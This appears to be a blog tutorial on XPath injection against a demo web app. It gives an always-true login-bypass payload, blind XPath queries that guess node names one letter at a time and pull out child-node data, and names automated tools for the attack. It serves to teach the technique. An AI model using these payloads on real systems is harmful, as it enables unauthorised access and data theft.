'1' = '1<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxxz-G_O96__WMxFJnBetfZYT93ojXfkljZpKTd6OfGWXYuTleCilK8fsBqadrEGriYo7o84GPVMe6KdxfIG7s7EisWvygsiTZZSJey-Mcwhj6M3fFxBjMRiwC4Bc7qNVm2_7nnhkYCoe3/s1600/Bypass-Login.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Bypass Authentication using XPATH injection" border="0" height="164" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxxz-G_O96__WMxFJnBetfZYT93ojXfkljZpKTd6OfGWXYuTleCilK8fsBqadrEGriYo7o84GPVMe6KdxfIG7s7EisWvygsiTZZSJey-Mcwhj6M3fFxBjMRiwC4Bc7qNVm2_7nnhkYCoe3/s320/Bypass-Login.PNG" title="Bypass Authentication using XPATH injection" width="320" /></a></div><div style="text-align: left;"></div><a name='more'></a>Looks quite familiar, doesn't it? Using these parameters, the query becomes:<br /><br />string(//Employee[uname/text()='' or '1' = '1' and passwd/text()='' or '1' = '1']/account/text())<br /><br />As in a common SQL Injection attack, we have created a query that is always evaluated as true, which means that the application will authenticate the user even if a username or a password have not been provided.<br /><br /><br /><h3 style="text-align: left;">Blind Xpath Injection:-</h3><div style="text-align: left;"><br />If there is no knowledge about the XML data internal details and if the application does not provide useful error messages that help us reconstruct its internal logic, it is possible to perform a Blind XPath Injection attack whose goal is to reconstruct the whole data structure.<br /><br />Browse to the search.php page. Enter any number, When you provide number it will display FirstName related to their ID.</div><div style="text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimUmUyiKaedrIwmbWspYIh8BCJ6VQNKIt4Io9Zsic6cj5xXIMtH-OcMt3chI_7hOdMV8Ib-XM2M6zlrxdfVE7diYG2nnERc4yEx_HHNdoCI729mMuaLkQZ-UnICAF3an4A7WKiVZh2rl4k/s1600/search-first-name.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Blind XPATH Injection" border="0" height="111" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimUmUyiKaedrIwmbWspYIh8BCJ6VQNKIt4Io9Zsic6cj5xXIMtH-OcMt3chI_7hOdMV8Ib-XM2M6zlrxdfVE7diYG2nnERc4yEx_HHNdoCI729mMuaLkQZ-UnICAF3an4A7WKiVZh2rl4k/s320/search-first-name.PNG" title="Blind XPATH Injection" width="320" /></a></div><div style="text-align: left;">Enter ' or '1' = '1 in search , & you will get all FirstName regardless of any ID(Number).</div><div style="text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjibHQDQ9IrJHS_97o_3mScbNjlwBSFMZu7LeeYkH_O_TgzgFv570vGE-42IPvXkXzTP0v5k2nXdxdQBFswSL3uUBmWK_u-C74djb6ckoV0wmxavA9HjIKi7_QlWpBjzFZ2cVtlzoC7GMBL/s1600/Bypass.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Blind XPATH Injection" border="0" height="118" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjibHQDQ9IrJHS_97o_3mScbNjlwBSFMZu7LeeYkH_O_TgzgFv570vGE-42IPvXkXzTP0v5k2nXdxdQBFswSL3uUBmWK_u-C74djb6ckoV0wmxavA9HjIKi7_QlWpBjzFZ2cVtlzoC7GMBL/s320/Bypass.PNG" title="Blind XPATH Injection" width="320" /></a></div><div style="text-align: left;">In blind Xpath injection we have to provide special crafted query to application, if query is true we will get result otherwise we will not get any result.Till now We don`t know about any parent or child node of XML document.</div><h3 style="text-align: left;">Guessing of parent node:-</h3><div style="text-align: left;"><br />Supply following query to application & observe result.<br /><br />' or substring(name(parent::*[position()=1]),1,1)='a<br /><br />Nothing append , we don`t get FirstName of users.<b>It means first letter of parent node is not "a"</b>. Now supply following query<br /><br />' or substring(name(parent::*[position()=1]),1,1)='E</div><div style="text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgag6vkFjcDMjaQ_o5TPXoulIoDCenU0gMFP4DkrXRu5vRdRUVSe5yf3ZyVl7bKfCbLUHkOuTnugAXuSD0-65jMrJsIHH7l7XveyvT2PtZYsE3obILgNIFSYRMJrc9L9CEPbcsIzeMEqs6P/s1600/Blind-xpath.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Blind XPATH Injection" border="0" height="119" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgag6vkFjcDMjaQ_o5TPXoulIoDCenU0gMFP4DkrXRu5vRdRUVSe5yf3ZyVl7bKfCbLUHkOuTnugAXuSD0-65jMrJsIHH7l7XveyvT2PtZYsE3obILgNIFSYRMJrc9L9CEPbcsIzeMEqs6P/s320/Blind-xpath.PNG" title="Blind XPATH Injection" width="320" /></a></div><div style="text-align: left;">You get result , <b>It means first letter of parent node is "E"</b></div><div style="text-align: left;"><br />To guess second letter of parent node supply following query<br /><br />' or substring(name(parent::*[position()=1]),2,1)='m<br /><br />Following the same procedure, we can extract the full name of the parent node, which was found to be '<b>Employee</b>'. </div><div style="text-align: left;"><br />We can also get child node. Browse to the xpath.php page & enter following query.<br /><br />//Employee[position()=3]/child::node()[position()=4]/text()</div><div style="text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJEM1ahTwbtTKf2aitReGTfnS1fW2dUCo9JeuUVlTpFNNhcvMHt0gt5NRhv4wAEgiZTRk8XwP7yTc5s4YQWqiRfpNMHYG4PxtT0DWA8WAERahFgXMrXW1Bo-oZq-mB3unaB3f9GDGyUmF6/s1600/Retriev+DATA.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="get-child-node" border="0" height="112" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJEM1ahTwbtTKf2aitReGTfnS1fW2dUCo9JeuUVlTpFNNhcvMHt0gt5NRhv4wAEgiZTRk8XwP7yTc5s4YQWqiRfpNMHYG4PxtT0DWA8WAERahFgXMrXW1Bo-oZq-mB3unaB3f9GDGyUmF6/s320/Retriev+DATA.PNG" title="get-child-node" width="320" /></a></div><div style="text-align: left;">You got output from parent node Employee id 3 & child node whose position is 2.</div><div style="text-align: left;"><br />To get whole document put following query.<br /><br />//Employee</div><div style="text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRqdtsM7sW2Z9HaUofBPk_OgzmP8zYFcJY85ZZPw7Clq_wOjpnjlWmlxg8eHYjh0Vq6z-ZHeKI-D5eMJ05__JV-Z1SCai3MWpIRAWKWO5DsF4M1tVMlimb1joVYKqirK1HKI_09o0mmX2S/s1600/GET-DATA.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Blind Xpath injection" border="0" height="192" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRqdtsM7sW2Z9HaUofBPk_OgzmP8zYFcJY85ZZPw7Clq_wOjpnjlWmlxg8eHYjh0Vq6z-ZHeKI-D5eMJ05__JV-Z1SCai3MWpIRAWKWO5DsF4M1tVMlimb1joVYKqirK1HKI_09o0mmX2S/s320/GET-DATA.PNG" title="Blind Xpath injection" width="320" /></a></div><div style="text-align: left;">It`s just concept how to retrieve data from XML document using XPATH injection.XPath contains two useful functions that can help you automate the preceding attack and quickly iterate through all nodes and data in the XML document:</div><div style="text-align: left;"><br /></div><ul style="text-align: left;"><li>count() returns the number of child nodes of a given element, which can be used to determine the range of position() values to iterate over.</li><li> string-length() returns the length of a supplied string, which can be used to determine the range of substring() values to iterate over.</li></ul><div style="text-align: left;">I used recon-ng xpath bruteforcer for xpath injection attack & we will get back end XML file.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvUDKa1rQBEt5SE5OtaoR6kNmq1y07Gw99jMMI3FnfMmEF_oMjN8446O6UOMC3tq5ciXoiRdX3NtZ4e8A3z_srd4GElAEu1KzxtpMsU49JZkAhOwkUHKKSSPnjYAbiY_0DlGIwoAXydo2_/s1600/Screenshot.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="xapth-bruteforcer" border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvUDKa1rQBEt5SE5OtaoR6kNmq1y07Gw99jMMI3FnfMmEF_oMjN8446O6UOMC3tq5ciXoiRdX3NtZ4e8A3z_srd4GElAEu1KzxtpMsU49JZkAhOwkUHKKSSPnjYAbiY_0DlGIwoAXydo2_/s320/Screenshot.png" title="xapth-bruteforcer" width="320" /></a></div><br />Useful Links & Blind XPATH injection Tools:-<br /><br /><a href="https://www.owasp.org/index.php/XPATH_Injection">https://www.owasp.org/index.php/XPATH_Injection</a><br /><a href="http://www.blogger.com/goog_913170007"><br /></a><a href="https://www.owasp.org/index.php/Blind_XPath_Injection">https://www.owasp.org/index.php/Blind_XPath_Injection</a><br /><br />XPATH BLIND EXPLORER:-  <a href="http://code.google.com/p/xpath-blind-explorer/downloads/list">http://code.google.com/p/xpath-blind-explorer/downloads/list</a><br /><br />XCAT:-  <a href="https://github.com/orf/xcat">https://github.com/orf/xcat</a></div></div>

XPATH Injection Tutorial

XPath is a language that has been designed and developed to operate on data that is described with XML. The XPath injection allows an attack...

+ Read more »